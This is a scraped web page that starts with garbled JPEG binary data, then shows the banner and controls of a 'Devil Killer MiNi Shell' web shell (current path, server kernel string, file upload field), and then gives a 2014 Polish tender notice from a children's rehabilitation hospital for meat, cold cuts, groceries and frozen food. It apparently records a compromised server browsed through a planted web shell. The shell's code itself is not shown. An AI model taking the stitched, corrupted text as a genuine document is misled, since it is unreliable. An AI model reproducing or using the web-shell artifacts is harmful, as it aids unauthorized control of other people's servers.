JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140514/103265-N-2014.html

<p class="kh_header"><b>Olsztynek: Sukcesywne dostawy art. spożywczych, mięsa wieprzowo - wołowego oraz drobiowego, wędlin, mrożonek owocowo-warzywnych i rybnych.</b><br>
<b>Numer ogłoszenia: 103265 - 2014; data zamieszczenia: 14.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Rehabilitacyjny dla Dzieci w Ameryce , Ameryka 21, 11-015 Olsztynek, woj. warmińsko-mazurskie, tel. 089 5194867, 5194810, faks 089 5194813.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ameryka.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy art. spożywczych, mięsa wieprzowo - wołowego oraz drobiowego, wędlin, mrożonek owocowo-warzywnych i rybnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Mięso
1	Łopatka wp b/k	kg.	500
2	Schab wp b/k	kg.	700
3	Szynka wp b/k surowa	kg.	900
4	Mięso gulaszowe wp.I	kg.	2 500
5	Mięso wp II chude	kg.	800
6	wołowina bez kości zrazowa	kg.	100

II. Wędliny
1	Biała surowa wp	kg	280
2	Kaszanka cienka gryczana	kg	120
3	Polędwica z piersi indyczej 	kg	400
4	Szynkowa grubo rozdrobniona	kg	150
5	Krakowska sucha	kg	50
6	Ogonówka	kg	320
7	Pasztetowa drobiowa	kg	300
8	Wędzonka Krotoszyńska 	kg	100
9	Mielonka wieprzowa 	kg	150
10	Kiełbasa gospodarcza	kg	100
11	Kiełbasa leśna	kg	50
12	Kiełbasa grunwaldzka	kg	100
13	Kiełbasa madrycka	kg	80
14	Kiełbasa szynkowa	kg	100
15	Szynka prasowana konserwowa	kg	150
16	Szynka wiejska	kg	500
17	Żywiecka wieprzowa podsuszana	kg	380
18	Kiełbasa delikatesowa z piersi kurczaka	kg	80
19	Parówki z indyka podwędzane bez polifosforanów	kg	1 500

III. Mięso drobiowe
1	Ćwiartka tylna z kurczaka	kg.	2100
2	Piersi drobiowe (filet)	kg.	650
3	Porcje  rosołowe	kg.	1300
4	Piersi indycze	kg.	460
5	Serca drobiowe	kg.	100
6	żołądki	kg.	100
7	wątroba	kg.	200

IV. Art.spożywcze 
1	Budyń smak wiśniowy brzoskwiniowy opakowanie op.+/-1kg (produkt dopuszczony do spożycia przez dzieci)	kg.	210
2	Bazylia 	kg	2
3	Chrupki kukurydziane op 80g 	op.	2 000
4	Chrzan tarty 290g 	kg	40
5	Chrzan śmietankowy op 970g	kg	100
6	Ciastka  deserowe luzem  mix	kg.	700
7	Ciastka z czekoladą luzem	kg	100
8	Wafelki świetankowe, 	kg	100
9	Cukier biały kryształ op.25kg	kg	3 000
10	Cukier biały kryształ op.1kg	kg.	2 000
11	Cukier waniliowy 16g	szt	2 900
12	Cukier puder	kg	20
13	Cynamon	szt	70
14	Dżemy niskosłodzone/czarna porzeczka 290g 	szt.	200
15	Dżem niskosłodzony aronia z jabł. 290g	szt	100
16	Dżem niskosłodzony aronia z jabł. 280g	szt.	100
17	Dżem niskosłodzony wiśnia 260g	szt	100
18	Dżem niskosłodzony czerwona porzeczka opa.3,5kg	kg	50
19	Dżem niskosłodzony aronia opa.3,5kg	kg	50
20	Dżem niskosłodzony wiśnia opa.3,5kg	kg	50
21	Fasola biała sucha	kg.	300
22	Galaretki owocowe smak wiśniowy brzoskwiniowy opakowanieop.1kg (produkt dopuszczony do spożycia przez dzieci)	kg.	170
23	Groch suchy połówki 	kg.	70
24	Herbata czarna expressowa w saszetkach pakowana w kartoniku po 100 szt.  Pojedyńcza torebka 1,4g	kg	55
25	herbata owocowa 	kg	30
26	Herbatniki maślane 100 g.pakowane po 10 szt 	szt	5 500
27	Kakao 100g niskotłuszczowe min 80%	kg	15
28	Kakao 200g niskotłuszczowe min.80%	kg	20
29	Kasza gryczana drobna op.1kg	kg.	300
30	Kasza jęczmienna średnia, paczkowana op. 1 kg	kg.	120
31	Kasza manna op.1 kg	kg	110
32	Kawa rozpuszczalna - zbożowa op.1kg	kg.	15
33	Kiśle smak wiśniowy brzoskwiniowy, op.1kg produkt dopuszczony do spożycia przez dzieci)	kg.	170
34	Koncentrat pomidorowy tylko z pomidorów op.190g 30%   bez konserwantów 	kg	60
35	Koncentrat pomidorowy op. 970g  30% bez konserwantów	kg	300
36	Kwasek cytrynowy 20g	szt.	530
37	Ketchup 970 / bez konserwantów i niezdrowych wzmacniaczy smaku min.184g pomidorów na 100g Ketchupu)	kg	130
38	Ketchup  200g bez konserwantów i niezdrowych wzmacniaczy smaku min .184g pomidorów na 100g Ketchupu	kg	50
	Kotlety sojowe op 100	op	30
39	Liść laurowy op.10g	kg 	2
40	Majonez  815g	kg	280
41	Majonez 280g	kg	100
42	mak	kg	50
43	makaron świderki drobne op.500g durum	kg.	180
44	makaron wstążka op. 400g durum	kg.	180
45	makaron łazanki op.500g durum	kg.	180
46	makaron nitka rosołowa op.500g 4-jajeczny	kg.	180
47	makaron do spagetti 500g mąka razowa	kg.	180
48	makaron drobny durum	kg	100
49	Mąka pszenna typ.400 op.1kg.	kg.	1 600
50	Mąka pszenna typ.400 op.25kg.	kg	1 000
51	Mąka ziemniaczana	kg.	120
52	Miód pszczeli 400g naturalny	kg	80
53	Miód pszczeli 1kg naturalny	kg	170
54	Majeranek 	kg	5
55	Musztarda 200g	szt	200
56	Marmolada twarda rózana	kg	20
57	Ocet spożywczy spirytusowy 10% -0,5L	L	260
58	Oregano 	kg	2
59	Olejki do ciast 	szt.	100
60	Olej rzepakowy opakowanie 3L	L	1 200
61	Olej rzepakowy opakowanie  1L	L	100
62	Olej rzepakowy  opakowanie 0,5l	L	200
63	Olej słonecznikowy op.1 L	L	400
64	Pieprz naturalny mielony 500g	kg.	22
65	Przyprawa do piernika 20g	szt.	20
66	Płatki kuleczki zbożowe smak czekoladowy ChocoChrups zawartość błonnika nie mniejsza niż  5,0 g w 100 g produktu	kg	400
67	Kółeczka  Honey Chrups 	kg	400
68	Płatki kuk.miodowo orzechowe zawartość błonnika nie mniejsza niż  3,0 g w 100 g produktu	kg	400
69	Paluszki słone op.100g	op.	70
70	Płatki kuk.Corn Fles z 5,0 g w 100 g produktu	kg	320
71	Płatki musli z owocami op.500g	kg	320
72	Płatki owsiane górskie op.500g	kg	40
73	Płatki zwykłe kukurydziane	kg	50
74	Pieprz czarny / nie mielony op.0,5 kg.	kg.	5
75	Pieczywo chrupkie typu Wasa żytnie op.210g opakowanie około 24 kromek	op	1 000
76	Pieczywo ryżowe 100g	szt	100
77	Proszek do pieczenia 18g	szt.	1 000
78	Rodzynki op.1kg	kg.	100
79	Ryż paraboliczny op 5kg	kg	400
80	Ryż biały paraboliczny op 1kg 	kg.	100
81	Sól morska	kg.	1 500
82	Sok smaki marchwiowo-owocowy bez cukru 0,9 L	szt.	4 000
83	soki  0,33l /op bez konserwantów	szt	1 000
84	Sok pomidorowy opak./bez konserwantów	l	50
85	Syrop pitny wysokosłodzony  420ml głóg, aronia czarna porzeczka, wiśnia. Malina bez konserwantów	szt.	600
86	Suchary bezcukrowe 285g	szt.	100
87	Soda spożywcza 100g	szt.	500
88	Słodycze bożonarodzeniowe (mikołaje 100g)	szt	250
89	Ziarno kukurydzy (popcorn)	kg.	200
90	Zioła prawensalskie 	kg	2
91	Zioło angielskie	kg	2
92	Zioła Estragon	kg	3

V. Mrożonki
1	brokuły	kg.	100
2	Fasolka szparagowa mroż	kg.	130
3	Groszek zielony mrożony	kg.	160
4	Kalafior mrożony	kg.	170
5	Kukurydza mrożona	kg.	170
6	Mieszanka komp.4 składniki	kg.	3000
7	Papryka mrożona cięta	kg.	100
8	Szpinak 	kg.	50
9	Filet mrożony / mintaj / bez glazury	kg.	700
10	Filet mrożony /sola/ miruna/bez glazury	kg.	250
11	Filet mrożony / dorsz bez glazury	kg.	200
12	Filet marynowany śledziowy	kg.	20
13	Ryba wędzona / makrela	kg.	400
14	truskawka mroż	kg.	100
15	Wiśnia bez pestek mroż.	kg.	650.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia art.22 ust1</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia art.22 ust1</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia art.22 ust1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia art.22 ust1</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia art.22 ust1</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1Złożenie ważnej decyzji o dopuszczeniu samochodu do przewozu żywności HDI Dz. U z 2003r. Nr 21 poz.179, którym będzie świadczona usługa,
2 Oświadczenie, że zakład ma wdrożony system HACCP lub GMP  i GHP;</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Sporządzony przez wykonawcę, według wzoru formularz ofertowy- stanowiący załącznik do SIWZ;
2.Sporządzony przez wykonawcę, według wzoru formularz cenowy -stosowny pakiet załącznik do SIWZ;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ameryka.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiającego - Dział administracji szpitala IV piętro lok.nr.404.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.05.2014 godzina 10:00, miejsce: Parter - recepcja szpitala.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mięso wieprzowo-wołowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Łopatka wp b/k	kg.	500
2	Schab wp b/k	kg.	700
3	Szynka wp b/k surowa	kg.	900
4	Mięso gulaszowe wp.I	kg.	2 500
5	Mięso wp II chude	kg.	800
6	wołowina bez kości zrazowa	kg.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Biała surowa wp	kg	280
2	Kaszanka cienka gryczana	kg	120
3	Polędwica z piersi indyczej 	kg	400
4	Szynkowa grubo rozdrobniona	kg	150
5	Krakowska sucha	kg	50
6	Ogonówka	kg	320
7	Pasztetowa drobiowa	kg	300
8	Wędzonka Krotoszyńska 	kg	100
9	Mielonka wieprzowa 	kg	150
10	Kiełbasa gospodarcza	kg	100
11	Kiełbasa leśna	kg	50
12	Kiełbasa grunwaldzka	kg	100
13	Kiełbasa madrycka	kg	80
14	Kiełbasa szynkowa	kg	100
15	Szynka prasowana konserwowa	kg	150
16	Szynka wiejska	kg	500
17	Żywiecka wieprzowa podsuszana	kg	380
18	Kiełbasa delikatesowa z piersi kurczaka	kg	80
19	Parówki z indyka podwędzane bez polifosforanów	kg	1 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Mięso drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ćwiartka tylna z kurczaka	kg.	2100
2	Piersi drobiowe (filet)	kg.	650
3	Porcje  rosołowe	kg.	1300
4	Piersi indycze	kg.	460
5	Serca drobiowe	kg.	100
6	żołądki	kg.	100
7	wątroba	kg.	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Art.Spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Budyń smak wiśniowy brzoskwiniowy opakowanie op.+/-1kg (produkt dopuszczony do spożycia przez dzieci)	kg.	210
2	Bazylia 	kg	2
3	Chrupki kukurydziane op 80g 	op.	2 000
4	Chrzan tarty 290g 	kg	40
5	Chrzan śmietankowy op 970g	kg	100
6	Ciastka  deserowe luzem  mix	kg.	700
7	Ciastka z czekoladą luzem	kg	100
8	Wafelki świetankowe, 	kg	100
9	Cukier biały kryształ op.25kg	kg	3 000
10	Cukier biały kryształ op.1kg	kg.	2 000
11	Cukier waniliowy 16g	szt	2 900
12	Cukier puder	kg	20
13	Cynamon	szt	70
14	Dżemy niskosłodzone/czarna porzeczka 290g 	szt.	200
15	Dżem niskosłodzony aronia z jabł. 290g	szt	100
16	Dżem niskosłodzony aronia z jabł. 280g	szt.	100
17	Dżem niskosłodzony wiśnia 260g	szt	100
18	Dżem niskosłodzony czerwona porzeczka opa.3,5kg	kg	50
19	Dżem niskosłodzony aronia opa.3,5kg	kg	50
20	Dżem niskosłodzony wiśnia opa.3,5kg	kg	50
21	Fasola biała sucha	kg.	300
22	Galaretki owocowe smak wiśniowy brzoskwiniowy opakowanieop.1kg (produkt dopuszczony do spożycia przez dzieci)	kg.	170
23	Groch suchy połówki 	kg.	70
24	Herbata czarna expressowa w saszetkach pakowana w kartoniku po 100 szt.  Pojedyńcza torebka 1,4g	kg	55
25	herbata owocowa 	kg	30
26	Herbatniki maślane 100 g.pakowane po 10 szt 	szt	5 500
27	Kakao 100g niskotłuszczowe min 80%	kg	15
28	Kakao 200g niskotłuszczowe min.80%	kg	20
29	Kasza gryczana drobna op.1kg	kg.	300
30	Kasza jęczmienna średnia, paczkowana op. 1 kg	kg.	120
31	Kasza manna op.1 kg	kg	110
32	Kawa rozpuszczalna - zbożowa op.1kg	kg.	15
33	Kiśle smak wiśniowy brzoskwiniowy, op.1kg produkt dopuszczony do spożycia przez dzieci)	kg.	170
34	Koncentrat pomidorowy tylko z pomidorów op.190g 30%   bez konserwantów 	kg	60
35	Koncentrat pomidorowy op. 970g  30% bez konserwantów	kg	300
36	Kwasek cytrynowy 20g	szt.	530
37	Ketchup 970 / bez konserwantów i niezdrowych wzmacniaczy smaku min.184g pomidorów na 100g Ketchupu)	kg	130
38	Ketchup  200g bez konserwantów i niezdrowych wzmacniaczy smaku min .184g pomidorów na 100g Ketchupu	kg	50
	Kotlety sojowe op 100	op	30
39	Liść laurowy op.10g	kg 	2
40	Majonez  815g	kg	280
41	Majonez 280g	kg	100
42	mak	kg	50
43	makaron świderki drobne op.500g durum	kg.	180
44	makaron wstążka op. 400g durum	kg.	180
45	makaron łazanki op.500g durum	kg.	180
46	makaron nitka rosołowa op.500g 4-jajeczny	kg.	180
47	makaron do spagetti 500g mąka razowa	kg.	180
48	makaron drobny durum	kg	100
49	Mąka pszenna typ.400 op.1kg.	kg.	1 600
50	Mąka pszenna typ.400 op.25kg.	kg	1 000
51	Mąka ziemniaczana	kg.	120
52	Miód pszczeli 400g naturalny	kg	80
53	Miód pszczeli 1kg naturalny	kg	170
54	Majeranek 	kg	5
55	Musztarda 200g	szt	200
56	Marmolada twarda rózana	kg	20
57	Ocet spożywczy spirytusowy 10% -0,5L	L	260
58	Oregano 	kg	2
59	Olejki do ciast 	szt.	100
60	Olej rzepakowy opakowanie 3L	L	1 200
61	Olej rzepakowy opakowanie  1L	L	100
62	Olej rzepakowy  opakowanie 0,5l	L	200
63	Olej słonecznikowy op.1 L	L	400
64	Pieprz naturalny mielony 500g	kg.	22
65	Przyprawa do piernika 20g	szt.	20
66	Płatki kuleczki zbożowe smak czekoladowy ChocoChrups zawartość błonnika nie mniejsza niż  5,0 g w 100 g produktu	kg	400
67	Kółeczka  Honey Chrups 	kg	400
